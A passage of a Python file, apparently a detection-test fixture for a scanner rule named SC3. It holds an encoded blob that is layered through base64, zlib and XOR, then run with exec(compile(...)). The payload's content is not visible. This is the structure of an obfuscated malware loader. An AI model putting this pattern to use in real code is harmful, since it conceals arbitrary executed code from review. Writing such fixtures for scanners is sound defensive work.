HScsGql7sHe6wuZZRN1PAr38fdfDiFAU0YkCrwie00v3nkGRCe/J3vv5q8wlb7d97O9xT4IpjreDi/L5EqTo5KkqrT+kAZ7aS+z+crRgtzuOcqWin5jarBX9of4i/vIyxzBNcr8c+/aT2Ilg=="
_K = bytes.fromhex("a676e0e09c69c276075d7be8")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
